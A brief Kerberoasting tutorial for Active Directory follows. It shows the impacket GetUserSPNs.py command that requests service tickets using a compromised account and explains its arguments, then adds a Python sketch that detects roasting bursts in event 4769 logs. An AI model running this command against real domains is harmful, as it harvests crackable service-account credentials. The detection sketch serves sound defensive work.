Kerberoasting
Kerberoasting takes advantage of the way the Kerberos protocol works in Active Directory environments. Read up on it here, here, and here.
Any authenticated member of a domain can perform this attack. To do so, we use the impacket script GetUserSPNs.py. On a default Kali install, you can find it by searching in the /usr/doc/python3-impacket/examples/ folder.
python3 GetUserSPNs.py -request -dc-ip 10.0.0.1 acme.corp/victim_user
10.0.0.1 = The IP of the domain controller
acme.corp = The domain (you will run into issues on this step: it is looking for the formal name of the domain, so I can’t just use ACME, for example)
victim_user = The user I compromised.
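Seen from the domain controller, the -request run above shows up as one account asking for service tickets for many user-backed services within seconds. The following is an added detection sketch, not part of the original notes or of impacket: it scans Windows Security event 4769 records (reduced to four fields) for that burst. The sample events are constructed, and the window and threshold are assumed values to tune locally.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: event 4769 ("A Kerberos service ticket was requested")
FIELDS = ("TimeCreated", "TargetUserName", "ServiceName", "TicketEncryptionType")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("2024-01-10T09:00:01", "victim_user@ACME.CORP", "svc_sql", "0x17"),
    ("2024-01-10T09:00:02", "victim_user@ACME.CORP", "svc_web", "0x17"),
    ("2024-01-10T09:00:02", "victim_user@ACME.CORP", "svc_backup", "0x17"),
    ("2024-01-10T09:00:03", "victim_user@ACME.CORP", "svc_iis", "0x17"),
    ("2024-01-10T09:05:00", "alice@ACME.CORP", "svc_sql", "0x12"),   # AES256
    ("2024-01-10T09:05:10", "alice@ACME.CORP", "FILE01$", "0x17"),   # machine account
    ("2024-01-10T09:00:00", "bob@ACME.CORP", "svc_sql", "0x17"),
    ("2024-01-10T11:00:00", "bob@ACME.CORP", "svc_web", "0x17"),
    ("2024-01-10T14:00:00", "bob@ACME.CORP", "svc_backup", "0x17"),
]]

RC4_HMAC = 0x17                 # ticket encryption type RC4-HMAC
WINDOW = timedelta(minutes=2)   # assumed look-back window
THRESHOLD = 3                   # assumed: distinct services per requester per window

def is_candidate(ev):
    """Keep RC4 tickets for user-backed services; skip machine accounts and krbtgt."""
    svc = ev["ServiceName"].lower()
    return (int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$") and svc != "krbtgt")

def find_roasting(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requester: sorted services} for bursts of >= threshold within window."""
    by_user = defaultdict(list)
    for ev in events:
        if is_candidate(ev):
            when = datetime.fromisoformat(ev["TimeCreated"])
            by_user[ev["TargetUserName"].lower()].append((when, ev["ServiceName"].lower()))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:  # slide window forward
                start += 1
            services = {s for _, s in reqs[start:end + 1]}
            if len(services) >= threshold:
                alerts[user] = sorted(services | set(alerts.get(user, [])))
    return alerts

if __name__ == "__main__":
    for user, services in find_roasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting: {user} -> {', '.join(services)}")
```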